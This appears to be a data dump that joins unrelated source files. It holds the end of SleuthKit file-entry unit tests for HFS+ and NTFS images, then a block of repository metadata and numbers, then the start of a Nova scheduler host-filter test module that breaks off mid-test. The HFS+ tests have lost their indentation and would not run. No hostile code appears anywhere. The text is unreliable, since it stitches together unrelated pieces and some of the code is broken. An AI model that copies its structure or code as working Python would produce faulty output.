inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.change_time)
def testCreationTime(self):
"""Test the creation_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.creation_time)
def testDeletionTime(self):
"""Test the deletion_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNone(file_entry.deletion_time)
def testModificationTime(self):
"""Test the modification_time property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertIsNotNone(file_entry.modification_time)
def testName(self):
"""Test the name property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.name, 'another_file')
def testSize(self):
"""Test the size property."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.size, 22)
# TODO: add tests for GetFileObject
def testGetFileEntryByPathSpec(self):
"""Tests the GetFileEntryByPathSpec function."""
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
def testGetLinkedFileEntry(self):
"""Tests the GetLinkedFileEntry function."""
test_location = '/a_link'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_LINK, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
linked_file_entry = file_entry.GetLinkedFileEntry()
self.assertIsNotNone(linked_file_entry)
self.assertEqual(linked_file_entry.name, 'another_file')
def testGetParentFileEntry(self):
"""Tests the GetParentFileEntry function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
parent_file_entry = file_entry.GetParentFileEntry()
self.assertIsNotNone(parent_file_entry)
self.assertEqual(parent_file_entry.name, 'a_directory')
def testGetStat(self):
"""Tests the GetStat function."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
stat_object = file_entry.GetStat()
self.assertIsNotNone(stat_object)
self.assertEqual(stat_object.type, stat_object.TYPE_FILE)
self.assertEqual(stat_object.size, 22)
self.assertEqual(stat_object.mode, 420)
self.assertEqual(stat_object.uid, 501)
self.assertEqual(stat_object.gid, 20)
self.assertEqual(stat_object.atime, 1596950907)
self.assertEqual(stat_object.atime_nano, 0)
self.assertEqual(stat_object.ctime, 1596950907)
self.assertEqual(stat_object.ctime_nano, 0)
self.assertEqual(stat_object.crtime, 1596950907)
self.assertEqual(stat_object.crtime_nano, 0)
self.assertEqual(stat_object.mtime, 1596950907)
self.assertEqual(stat_object.mtime_nano, 0)
# TODO: add tests for GetTSKFile
def testIsFunctions(self):
"""Tests the Is? functions."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertFalse(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertFalse(file_entry.IsDirectory())
self.assertTrue(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
test_location = '/a_directory'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertFalse(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertTrue(file_entry.IsDirectory())
self.assertFalse(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertTrue(file_entry.IsRoot())
self.assertFalse(file_entry.IsVirtual())
self.assertTrue(file_entry.IsAllocated())
self.assertFalse(file_entry.IsDevice())
self.assertTrue(file_entry.IsDirectory())
self.assertFalse(file_entry.IsFile())
self.assertFalse(file_entry.IsLink())
self.assertFalse(file_entry.IsPipe())
self.assertFalse(file_entry.IsSocket())
def testSubFileEntries(self):
"""Tests the number_of_sub_file_entries and sub_file_entries properties."""
path_spec = tsk_path_spec.TSKPathSpec(
location='/', parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_sub_file_entries, 11)
expected_sub_file_entry_names = [
'$ExtentsFile',
'$CatalogFile',
'$BadBlockFile',
'$AllocationFile',
'$AttributesFile',
'.fseventsd',
'.HFS+ Private Directory Data\r',
'a_directory',
'a_link',
'passwords.txt',
'^^^^HFS+ Private Data']
sub_file_entry_names = []
for sub_file_entry in file_entry.sub_file_entries:
sub_file_entry_names.append(sub_file_entry.name)
self.assertEqual(
len(sub_file_entry_names), len(expected_sub_file_entry_names))
self.assertEqual(
sorted(sub_file_entry_names), sorted(expected_sub_file_entry_names))
# Test a path specification without a location.
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_sub_file_entries, 2)
def testDataStreams(self):
"""Tests the data streams functionality."""
test_location = '/a_directory/another_file'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_ANOTHER_FILE, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 1)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [''])
test_location = '/a_directory'
path_spec = tsk_path_spec.TSKPathSpec(
inode=self._INODE_A_DIRECTORY, location=test_location,
parent=self._os_path_spec)
file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
self.assertIsNotNone(file_entry)
self.assertEqual(file_entry.number_of_data_streams, 0)
data_stream_names = []
for data_stream in file_entry.data_streams:
data_stream_names.append(data_stream.name)
self.assertEqual(data_stream_names, [])
def testGetDataStream(self):
  """Tests the GetDataStream function."""
  path_spec = tsk_path_spec.TSKPathSpec(
      inode=self._INODE_ANOTHER_FILE,
      location='/a_directory/another_file',
      parent=self._os_path_spec)
  file_entry = self._file_system.GetFileEntryByPathSpec(path_spec)
  self.assertIsNotNone(file_entry)

  # The default (unnamed) data stream is retrieved with an empty name.
  data_stream = file_entry.GetDataStream('')
  self.assertIsNotNone(data_stream)
class TSKFileEntryTestNTFS(shared_test_lib.BaseTestCase):
  """Tests the SleuthKit (TSK) file entry on NTFS."""

  # Location of the Volume Shadow Snapshot store file used by most tests.
  _TEST_LOCATION = (
      '/System Volume Information/{3808876b-c176-4e48-b7ae-04046e6cc752}')

  def setUp(self):
    """Sets up the needed objects used throughout the test."""
    self._resolver_context = context.Context()
    test_file = self._GetTestFilePath(['vsstest.qcow2'])
    self._SkipIfPathNotExists(test_file)

    path_spec = os_path_spec.OSPathSpec(location=test_file)
    self._qcow_path_spec = qcow_path_spec.QCOWPathSpec(parent=path_spec)
    self._tsk_path_spec = tsk_path_spec.TSKPathSpec(
        location='/', parent=self._qcow_path_spec)

    self._file_system = tsk_file_system.TSKFileSystem(self._resolver_context)
    self._file_system.Open(self._tsk_path_spec)

  def tearDown(self):
    """Cleans up the needed objects used throughout the test."""
    self._file_system.Close()
    self._resolver_context.Empty()

  def _GetTestFileEntry(self, inode=38, location=None):
    """Retrieves a file entry from the test file system.

    Deduplicates the path specification boilerplate that every test in
    this class repeated verbatim.

    Args:
      inode (Optional[int]): inode number of the file entry, defaults to
          the VSS store file.
      location (Optional[str]): location (path) of the file entry,
          defaults to _TEST_LOCATION.

    Returns:
      TSKFileEntry: file entry or None if not available.
    """
    if location is None:
      location = self._TEST_LOCATION
    path_spec = tsk_path_spec.TSKPathSpec(
        inode=inode, location=location, parent=self._qcow_path_spec)
    return self._file_system.GetFileEntryByPathSpec(path_spec)

  # TODO: add tests for _GetAttributes
  # TODO: add tests for _GetDataStreams
  # TODO: add tests for _GetDirectory
  # TODO: add tests for _GetLink
  # TODO: add tests for _GetStat
  # TODO: add tests for _GetSubFileEntries
  # TODO: add tests for _GetTimeValue
  # TODO: add tests for _TSKFileTimeCopyToStatTimeTuple

  def testAccessTime(self):
    """Test the access_time property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertIsNotNone(file_entry.access_time)

  def testBackupTime(self):
    """Test the backup_time property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    # NTFS does not track a backup time.
    self.assertIsNone(file_entry.backup_time)

  def testChangeTime(self):
    """Test the change_time property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertIsNotNone(file_entry.change_time)

  def testCreationTime(self):
    """Test the creation_time property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertIsNotNone(file_entry.creation_time)

  def testDeletionTime(self):
    """Test the deletion_time property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    # The test file entry is not deleted hence no deletion time.
    self.assertIsNone(file_entry.deletion_time)

  def testModificationTime(self):
    """Test the modification_time property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertIsNotNone(file_entry.modification_time)

  def testName(self):
    """Test the name property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertEqual(file_entry.name, '{3808876b-c176-4e48-b7ae-04046e6cc752}')

  def testSize(self):
    """Test the size property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertEqual(file_entry.size, 65536)

  def testGetStat(self):
    """Tests the GetStat function."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)

    stat_object = file_entry.GetStat()
    self.assertIsNotNone(stat_object)
    self.assertEqual(stat_object.type, stat_object.TYPE_FILE)
    self.assertEqual(stat_object.size, 65536)

    self.assertEqual(stat_object.mode, 365)
    self.assertEqual(stat_object.uid, 0)
    self.assertEqual(stat_object.gid, 0)

    # Timestamps are POSIX seconds with a separate 100ns remainder.
    self.assertEqual(stat_object.atime, 1386052509)
    self.assertEqual(stat_object.atime_nano, 5023783)
    self.assertEqual(stat_object.ctime, 1386052509)
    self.assertEqual(stat_object.ctime_nano, 5179783)
    self.assertEqual(stat_object.crtime, 1386052509)
    self.assertEqual(stat_object.crtime_nano, 5023783)
    self.assertEqual(stat_object.mtime, 1386052509)
    self.assertEqual(stat_object.mtime_nano, 5179783)

  def testAttributes(self):
    """Tests the number_of_attributes property."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertEqual(file_entry.number_of_attributes, 4)

  def testDataStream(self):
    """Tests the number_of_data_streams and data_streams properties."""
    # A regular file has a single, unnamed data stream.
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)
    self.assertEqual(file_entry.number_of_data_streams, 1)

    data_stream_names = [
        data_stream.name for data_stream in file_entry.data_streams]
    self.assertEqual(data_stream_names, [''])

    # A directory has no data streams.
    file_entry = self._GetTestFileEntry(
        inode=36, location='/System Volume Information')
    self.assertIsNotNone(file_entry)
    self.assertEqual(file_entry.number_of_data_streams, 0)

    data_stream_names = [
        data_stream.name for data_stream in file_entry.data_streams]
    self.assertEqual(data_stream_names, [])

    # An NTFS file with an alternate data stream ($Config) has two.
    file_entry = self._GetTestFileEntry(
        inode=28, location='/$Extend/$RmMetadata/$Repair')
    self.assertIsNotNone(file_entry)
    self.assertEqual(file_entry.number_of_data_streams, 2)

    data_stream_names = [
        data_stream.name for data_stream in file_entry.data_streams]
    self.assertEqual(sorted(data_stream_names), sorted(['', '$Config']))

  def testGetDataStream(self):
    """Tests the retrieve data stream functionality."""
    file_entry = self._GetTestFileEntry()
    self.assertIsNotNone(file_entry)

    data_stream_name = ''
    data_stream = file_entry.GetDataStream(data_stream_name)
    self.assertIsNotNone(data_stream)
    self.assertEqual(data_stream.name, data_stream_name)

    # A non-existing data stream name yields None.
    data_stream = file_entry.GetDataStream('bogus')
    self.assertIsNone(data_stream)

    # Retrieve an NTFS alternate data stream by name.
    file_entry = self._GetTestFileEntry(
        inode=28, location='/$Extend/$RmMetadata/$Repair')
    self.assertIsNotNone(file_entry)

    data_stream_name = '$Config'
    data_stream = file_entry.GetDataStream(data_stream_name)
    self.assertIsNotNone(data_stream)
    self.assertEqual(data_stream.name, data_stream_name)
# Run the tests when the module is executed directly.
if __name__ == '__main__':
  unittest.main()
| 36.290292
| 79
| 0.749351
| 4,743
| 38,504
| 5.719165
| 0.058613
| 0.090577
| 0.048404
| 0.070191
| 0.92804
| 0.900723
| 0.870714
| 0.864337
| 0.849923
| 0.847453
| 0
| 0.025036
| 0.154555
| 38,504
| 1,060
| 80
| 36.324528
| 0.808251
| 0.101132
| 0
| 0.848276
| 0
| 0
| 0.061219
| 0.039255
| 0
| 0
| 0.00146
| 0.000943
| 0.314483
| 1
| 0.084138
| false
| 0.002759
| 0.012414
| 0
| 0.111724
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c4bdf4d612382c722fa3389cba85d3514a9bcb8d
| 39,710
|
py
|
Python
|
nova/tests/scheduler/test_host_filters.py
|
781778304/nova
|
05aff1959c9f94dae095635133386418390efb37
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/scheduler/test_host_filters.py
|
781778304/nova
|
05aff1959c9f94dae095635133386418390efb37
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/scheduler/test_host_filters.py
|
781778304/nova
|
05aff1959c9f94dae095635133386418390efb37
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2011 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Scheduler Host Filters.
"""
import httplib
import stubout
from nova import context
from nova import exception
from nova import flags
from nova.openstack.common import jsonutils
from nova.scheduler import filters
from nova.scheduler.filters.trusted_filter import AttestationService
from nova import test
from nova.tests.scheduler import fakes
from nova import utils
DATA = ''
def stub_out_https_backend(stubs):
    """Stub out AttestationService._do_request for the tests.

    Replaces the HTTPS round trip with a fake that always reports
    httplib.OK and whose response body is the module-level DATA string
    (empty by default), so no network access occurs.

    :param stubs: Set of stubout stubs
    """
    class FakeHTTPResponse(object):
        # Minimal stand-in for the httplib response object.
        def read(self):
            return DATA

    def fake_do_request(self, *args, **kwargs):
        return httplib.OK, FakeHTTPResponse()

    stubs.Set(AttestationService, '_do_request', fake_do_request)
class TestFilter(filters.BaseHostFilter):
    """Marker filter class used by the get_filter_classes tests."""
    pass
class TestBogusFilter(object):
    """Class that doesn't inherit from BaseHostFilter.

    Used to verify that get_filter_classes rejects non-filter classes.
    """
    pass
class HostFiltersTestCase(test.TestCase):
"""Test case for host filters."""
def setUp(self):
    """Set up stubs, a request context, a JSON query and the filter map."""
    super(HostFiltersTestCase, self).setUp()
    self.stubs = stubout.StubOutForTesting()
    # Prevent the TrustedFilter tests from making real HTTPS requests.
    stub_out_https_backend(self.stubs)
    self.context = context.RequestContext('fake', 'fake')
    # Query used by several JsonFilter tests: >=1024MB RAM, >=200GB disk.
    self.json_query = jsonutils.dumps(
        ['and', ['>=', '$free_ram_mb', 1024],
                ['>=', '$free_disk_mb', 200 * 1024]])
    # This has a side effect of testing 'get_filter_classes'
    # when specifying a method (in this case, our standard filters)
    classes = filters.get_filter_classes(
        ['nova.scheduler.filters.standard_filters'])
    self.class_map = {}
    for cls in classes:
        self.class_map[cls.__name__] = cls
def test_get_filter_classes(self):
    """get_filter_classes resolves single classes and filter modules."""
    classes = filters.get_filter_classes(
        ['nova.tests.scheduler.test_host_filters.TestFilter'])
    self.assertEqual(len(classes), 1)
    self.assertEqual(classes[0].__name__, 'TestFilter')
    # Test a specific class along with our standard filters
    classes = filters.get_filter_classes(
        ['nova.tests.scheduler.test_host_filters.TestFilter',
         'nova.scheduler.filters.standard_filters'])
    self.assertEqual(len(classes), 1 + len(self.class_map))
def test_get_filter_classes_raises_on_invalid_classes(self):
    """Unknown names raise ImportError; non-filter classes ClassNotFound."""
    self.assertRaises(ImportError,
                      filters.get_filter_classes,
                      ['nova.tests.scheduler.test_host_filters.NoExist'])
    self.assertRaises(exception.ClassNotFound,
                      filters.get_filter_classes,
                      ['nova.tests.scheduler.test_host_filters.TestBogusFilter'])
def test_all_host_filter(self):
    """AllHostsFilter accepts any host unconditionally."""
    host_filter = self.class_map['AllHostsFilter']()
    host_state = fakes.FakeHostState('host1', 'compute', {})
    self.assertTrue(host_filter.host_passes(host_state, {}))
def _stub_service_is_up(self, ret_value):
    """Stub utils.service_is_up to always return *ret_value*."""
    def fake_service_is_up(service):
        return ret_value
    self.stubs.Set(utils, 'service_is_up', fake_service_is_up)
def test_affinity_different_filter_passes(self):
    """DifferentHostFilter passes when the hinted instance is elsewhere."""
    filt_cls = self.class_map['DifferentHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    instance = fakes.FakeInstance(context=self.context,
                                  params={'host': 'host2'})
    instance_uuid = instance.uuid
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'different_host': [instance_uuid], }}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_different_filter_no_list_passes(self):
    """A bare uuid hint (not wrapped in a list) is also accepted."""
    filt_cls = self.class_map['DifferentHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    instance = fakes.FakeInstance(context=self.context,
                                  params={'host': 'host2'})
    instance_uuid = instance.uuid
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'different_host': instance_uuid}}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_different_filter_fails(self):
    """DifferentHostFilter fails when the hinted instance is on this host."""
    filt_cls = self.class_map['DifferentHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    instance = fakes.FakeInstance(context=self.context,
                                  params={'host': 'host1'})
    instance_uuid = instance.uuid
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'different_host': [instance_uuid], }}
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_affinity_different_filter_handles_none(self):
    """DifferentHostFilter passes when scheduler_hints is None."""
    filt_cls = self.class_map['DifferentHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    # The instance is created only for fixture parity with the other
    # affinity tests; its uuid was previously bound to an unused local.
    fakes.FakeInstance(context=self.context,
                       params={'host': 'host2'})
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': None}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_no_list_passes(self):
    """A bare uuid hint (not wrapped in a list) is also accepted."""
    filt_cls = self.class_map['SameHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    instance = fakes.FakeInstance(context=self.context,
                                  params={'host': 'host1'})
    instance_uuid = instance.uuid
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'same_host': instance_uuid}}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_passes(self):
    """SameHostFilter passes when the hinted instance is on this host."""
    filt_cls = self.class_map['SameHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    instance = fakes.FakeInstance(context=self.context,
                                  params={'host': 'host1'})
    instance_uuid = instance.uuid
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'same_host': [instance_uuid], }}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_fails(self):
    """SameHostFilter fails when the hinted instance is elsewhere."""
    filt_cls = self.class_map['SameHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    instance = fakes.FakeInstance(context=self.context,
                                  params={'host': 'host2'})
    instance_uuid = instance.uuid
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'same_host': [instance_uuid], }}
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_affinity_same_filter_handles_none(self):
    """SameHostFilter passes when scheduler_hints is None."""
    filt_cls = self.class_map['SameHostFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    # The instance is created only for fixture parity with the other
    # affinity tests; its uuid was previously bound to an unused local.
    fakes.FakeInstance(context=self.context,
                       params={'host': 'host2'})
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': None}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_simple_cidr_filter_passes(self):
    """Host IP inside the hinted /24 of the affinity IP passes."""
    filt_cls = self.class_map['SimpleCIDRAffinityFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    host.capabilities = {'host_ip': '10.8.1.1'}
    affinity_ip = "10.8.1.100"
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'cidr': '/24',
                             'build_near_host_ip': affinity_ip}}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_affinity_simple_cidr_filter_fails(self):
    """A /32 mask requires an exact IP match, so a different host fails."""
    filt_cls = self.class_map['SimpleCIDRAffinityFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    host.capabilities = {'host_ip': '10.8.1.1'}
    affinity_ip = "10.8.1.100"
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': {
                             'cidr': '/32',
                             'build_near_host_ip': affinity_ip}}
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_affinity_simple_cidr_filter_handles_none(self):
    """SimpleCIDRAffinityFilter passes when scheduler_hints is None.

    The original built an affinity IP from FLAGS.my_ip into a local that
    was never used (the hints are None); the dead computation is removed.
    """
    filt_cls = self.class_map['SimpleCIDRAffinityFilter']()
    host = fakes.FakeHostState('host1', 'compute', {})
    filter_properties = {'context': self.context.elevated(),
                         'scheduler_hints': None}
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes(self):
    """ComputeFilter passes an enabled, up host with enough RAM."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': True}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_type_filter(self):
    """TypeAffinityFilter only accepts hosts homogeneous in flavor id."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['TypeAffinityFilter']()
    filter_properties = {'context': self.context,
                         'instance_type': {'id': 1}}
    filter2_properties = {'context': self.context,
                          'instance_type': {'id': 2}}
    capabilities = {'enabled': True}
    service = {'disabled': False}
    host = fakes.FakeHostState('fake_host', 'compute',
                               {'capabilities': capabilities,
                                'service': service})
    # True since empty
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
    # FakeInstance registers an instance on fake_host as a side effect.
    fakes.FakeInstance(context=self.context,
                       params={'host': 'fake_host', 'instance_type_id': 1})
    # True since same type
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
    # False since different type
    self.assertFalse(filt_cls.host_passes(host, filter2_properties))
    # False since node not homogeneous
    fakes.FakeInstance(context=self.context,
                       params={'host': 'fake_host', 'instance_type_id': 2})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_ram_filter_fails_on_memory(self):
    """RamFilter fails when free RAM is one MB short of the request."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['RamFilter']()
    self.flags(ram_allocation_ratio=1.0)
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': True}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1023,
                                'total_usable_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_ram_filter_oversubscribe(self):
    """With a 2.0 allocation ratio, negative free RAM can still pass."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['RamFilter']()
    self.flags(ram_allocation_ratio=2.0)
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': True}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': -1024,
                                'total_usable_ram_mb': 2048,
                                'capabilities': capabilities,
                                'service': service})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_on_service_disabled(self):
    """ComputeFilter fails when the compute service is disabled."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': True}
    service = {'disabled': True}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_on_service_down(self):
    """ComputeFilter fails when the service heartbeat reports it down."""
    self._stub_service_is_up(False)
    filt_cls = self.class_map['ComputeFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': True}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_fails_on_capability_disabled(self):
    """ComputeFilter fails when the host capabilities are disabled."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': False}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertFalse(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes_on_volume(self):
    """Non-compute topics (here 'volume') are not checked and pass."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeFilter']()
    filter_properties = {'instance_type': {'memory_mb': 1024}}
    capabilities = {'enabled': False}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'volume',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes_on_no_instance_type(self):
    """Without an instance_type in the request the filter passes."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeFilter']()
    filter_properties = {}
    capabilities = {'enabled': False}
    service = {'disabled': False}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
    self.assertTrue(filt_cls.host_passes(host, filter_properties))
def test_compute_filter_passes_extra_specs(self):
    """ComputeCapabilitiesFilter passes when all extra_specs match."""
    self._stub_service_is_up(True)
    filt_cls = self.class_map['ComputeCapabilitiesFilter']()
    extra_specs = {'opt1': 1, 'opt2': 2}
    capabilities = {'enabled': True, 'opt1': 1, 'opt2': 2}
    service = {'disabled': False}
    filter_properties = {'instance_type': {'memory_mb': 1024,
                                           'extra_specs': extra_specs}}
    host = fakes.FakeHostState('host1', 'compute',
                               {'free_ram_mb': 1024,
                                'capabilities': capabilities,
                                'service': service})
